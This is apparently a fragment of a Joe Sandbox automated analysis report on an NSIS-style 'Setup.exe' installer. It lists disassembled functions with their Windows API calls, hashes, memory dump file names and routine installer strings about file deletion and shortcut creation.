                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                  • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                  • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                  • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                  • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                  • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                  • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                  Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                  • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                  • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                  • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                  Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                  • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                  • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                  • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                  • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $ @$M$N
                                                                                                                                  • API String ID: 1638840714-3479655940
                                                                                                                                  • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                  • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                  • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                  • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                  Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                  • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                  • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                  • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                  • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                  Strings
                                                                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                  • ptF, xrefs: 00406D1A
                                                                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                  • \*.*, xrefs: 00406D2F
                                                                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                  • API String ID: 2035342205-1650287579
                                                                                                                                  • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                  • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                  • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                  • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                  Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                  • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                  • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                    • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                    • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,74DF23A0,00000000), ref: 00406902
                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                  • String ID: F$A
                                                                                                                                  • API String ID: 3347642858-1281894373
                                                                                                                                  • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                  • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                  • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                  • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                  Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                  • API String ID: 1916479912-1189179171
                                                                                                                                  • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                  • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                  • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                  • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                  Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,74DF23A0,00000000), ref: 00406902
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                  • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                  • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,74DF23A0,00000000), ref: 00406A73
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                  • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 3581403547-1792361021
                                                                                                                                  • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                  • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                  • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                  • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                  Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                  Strings
                                                                                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                  • API String ID: 542301482-1377821865
                                                                                                                                  • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                  • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                  • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                  • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                  Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                  Download Yara Rule
